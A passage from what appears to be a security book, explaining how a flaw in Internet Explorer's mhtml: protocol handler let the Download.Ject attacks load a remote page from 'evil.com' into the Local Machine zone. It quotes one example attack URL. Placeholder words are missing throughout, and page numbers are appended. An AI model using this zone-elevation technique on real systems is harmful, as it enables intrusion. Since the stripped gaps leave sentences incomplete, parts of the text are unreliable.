Ject attacks was in the mhtml:
protocol handler. A protocol handler is code that handles protocols like http:, ftp:, and
rtsp:. Internet Explorer passes the URL following the protocol name to the protocol handler
to, well, handle. The mhtml: protocol URLs are of the following form: ???mhtml://
!???, with the body URL being loaded into the Root URL.
However, the mhtml: protocol handler had a critical flaw that allowed a cross-zone elevation
from the Internet zone into the LMZ. If the in the preceding syntax
was not reachable, IE would load only the , but would load that URL into
the same security zone where the ROOT-URL would have been loaded if it had existed.
More concretely, imagine what would happen given the vulnerable mhtml: protocol
handler loading this URL: ???mhtml:file://c:/bogus.mht!http://evil.com/evil.html???. The
points to a file on the local file system. However, the attackers used a reference
that they knew would never exist. The location could not be found, but IE still
navigates to the , unfortunately opened in the Local Machine zone where
the was supposed to be loaded from. Whoops! In the case of Ibiza and
Download.Ject, this evil.
Pages:
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657